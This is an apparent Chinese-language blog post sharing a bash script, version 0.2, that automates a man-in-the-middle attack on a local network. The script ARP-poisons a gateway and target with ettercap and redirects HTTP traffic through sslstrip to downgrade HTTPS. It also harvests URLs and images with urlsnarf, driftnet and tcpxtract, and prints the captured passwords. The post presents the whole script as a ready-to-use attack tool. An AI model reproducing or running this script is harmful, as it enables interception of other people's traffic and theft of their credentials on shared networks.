一个简单的脚本,实现自动执行MITM攻击(更新0.2)

这几天折腾MITM攻击,反复输入同样的命令很烦人,参照国外论坛一个脚本,结合自己的习惯修改了一下,将几个常用命令写到一个文件里,实现相对自动的操作。

脚本很简单,简单说一下功能,内容就不多注释了。

1)设置监听网卡、端口、目标IP;

2)设置tcpxtract、driftnet、urlsnarf等辅助工具的启用;

3)自动运行sslstrip和ettercap,并输出数据到/tmp/(用户定义)目录中供后期分析;

4)监听结束后调用etterlog显示数据,并调用wireshark进行抓包分析;

5)简单的输入判定;

6)可以在命令行中输入一组或两组IP,重复运行时可通过bash log获取上次输入,不用每次运行都要重复输入IP。(更新)

代码如下:

#!/bin/bash
echo ""
echo "============================================="
echo "  ___  _   _ _____  ___      ____  ___   ___ "
echo " |___| |   |   |   |   |     |    |___| |___]"
echo " |   | |___|   |   |___| ___ |___ |   | |    "
echo ""
echo "                              0.2  2014-2-21 "
echo "                            |t|a|n|k|a|i|h|a|"
echo ""
echo "usage: auto_cap.sh  [gatewayIP]  [hostIP]"
echo ""
echo "============================================="
echo ""
while [ -z $DIRNAME ]
do
  read -p "1)设置保存名称,所有数据将保存在/tmp/\"输入名称\"/目录中(重复目录强制删除):" DIRNAME
done
if [ "$1" != "" ] ; then
  GATEWAY=$1
  echo -e "\n2)网关地址已设置为:$GATEWAY"
else
  echo "";read -p "2)请设置网关地址(默认为192.168.1.1):" GATEWAY
fi
if [ "$2" != "" ] ; then
  TARGET=$2
  echo -e "\n3)监听IP地址已设置为:$TARGET"
else
  echo "";read -p "3)请设置需要监听的IP地址,什么都不输入时全部监听:" TARGET
fi
echo "";read -p "4)是否使用tcpxtract自动导出图片文件(有时时间较长,默认n)[y..n]:" XTRACT
echo "";read -p "5)是否使用driftnet实时查看图片(默认y)[y..n]:" DRIFT
echo "";read -p "6)是否使用urlsnarf导出所有网站地址到txt文件(默认y)[y..n]:" SNARF
echo -e "\n本机可用网络设备如下:"
ifconfig | cut -d " " -f 1 |awk '$1 ~ /[^ ]/ {print $1}'
while [ -z $IFACE ]
do
  read -p "7)设置监听设备(不能为空):" IFACE
done
echo "";read -p "8)设置监听端口(默认10000):" SNIFFPORT
if [ -z $SNIFFPORT ];then
  SNIFFPORT=10000
fi
rm -rf /tmp/$DIRNAME/
mkdir /tmp/$DIRNAME/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $SNIFFPORT
sslstrip -pkf -l $SNIFFPORT -w /tmp/$DIRNAME/$DIRNAME.log 2>/dev/null &
if [ "$SNARF" == "y" ] || [ -z $SNARF ] ; then
  urlsnarf -i $IFACE | grep http > /tmp/$DIRNAME/$DIRNAME.txt &
fi
if [ "$DRIFT" == "y" ] ||  [ -z $DRIFT ] ; then
  driftnet -i $IFACE &
fi
echo -e "\n下面开始监听,按q键退出"

if [ ${#GATEWAY} -eq 0 ];then
  GATEWAY="192.168.1.1"
fi
ettercap -Tq -i $IFACE -w /tmp/$DIRNAME/$DIRNAME.pcap -L /tmp/$DIRNAME/$DIRNAME -M arp:remote /$GATEWAY/ /$TARGET/
killall sslstrip
killall python
killall urlsnarf
killall driftnet
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "监听结束,下面进行后处理...\n"
if [ "$XTRACT" == "y" ];then
 echo -e "tcpxtract正在导出图片...\n"
 tcpxtract -f /tmp/$DIRNAME/$DIRNAME.pcap -o /tmp/$DIRNAME/ &
fi
echo -e "\n\n================================"
echo -e "ettercap嗅探到的密码如下:"
etterlog -p -i /tmp/$DIRNAME/$DIRNAME.eci
read -p "是否用wireshark分析?(默认n):" SHARK
if [ "$SHARK" == "y" ];then
  wireshark /tmp/$DIRNAME/$DIRNAME.pcap &
fi
echo -e "\n程序退出...\n"

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注